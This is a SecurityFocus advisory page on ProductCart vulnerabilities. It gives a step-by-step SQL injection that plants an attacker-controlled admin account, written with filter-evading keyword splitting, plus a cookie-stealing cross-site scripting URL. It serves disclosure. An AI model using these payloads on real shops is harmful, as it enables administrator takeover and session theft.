Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

EarlyImpact ProductCart Multiple Vulnerabilities

The following examples were submitted:

1. An attacker register new customer in store. Let the value of 'First
Name' field in registration form will be equal to
'1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal
to '34567', the value of 'Password' field will be equal to '111' and the
value of 'Postal Code' field will be equal to '987654'.

2. An attacker performs the following request:

http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&


3. An attacker logs into the store admin interface with username
'34567' and password '111'.

Cross-site scripting:

http://www.example.com/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"







 

Privacy Statement
Copyright 2009, SecurityFocus